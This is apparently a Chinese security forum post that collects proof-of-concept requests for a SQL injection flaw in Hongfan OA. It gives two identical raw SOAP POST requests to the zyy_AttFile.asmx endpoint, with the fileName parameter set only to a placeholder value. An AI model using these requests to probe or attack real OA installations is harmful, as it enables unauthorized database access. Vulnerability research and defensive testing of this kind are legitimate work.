DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 免杀
查看: 2161|回复: 0

[2023HW] 红帆漏洞 PoC 整理

[复制链接]

172

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
339
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-8-16 22:21:09 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

红帆 OA 注入


  1. POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
  2. Host: 10.250.250.5
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
  4. like Gecko) Version/12.0.3 Safari/605.1.15
  5. Content-Length: 383
  6. Content-Type: text/xml; charset=utf-8
  7. Soapaction: "http://tempuri.org/GetFileAtt"
  8. Accept-Encoding: gzip, deflate
  9. Connection: close
  10. <?xml version="1.0" encoding="utf-8"?><soap:Envelope
  11. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  12. xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  13. xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
  14. xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
  15. ap:Envelope>
复制代码

红帆 OA zyy_AttFile.asmx SQL 注入漏洞


  1. POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
  2. Host: 10.250.250.5
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
  4. like Gecko) Version/12.0.3 Safari/605.1.15
  5. Content-Length: 383
  6. Content-Type: text/xml; charset=utf-8
  7. Soapaction: "http://tempuri.org/GetFileAtt"
  8. Accept-Encoding: gzip, deflate
  9. Connection: close
  10. <?xml version="1.0" encoding="utf-8"?><soap:Envelope
  11. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  12. xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  13. xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
  14. xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
  15. ap:Envelope>
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-4-30 05:24 , Processed in 0.057947 second(s), 25 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表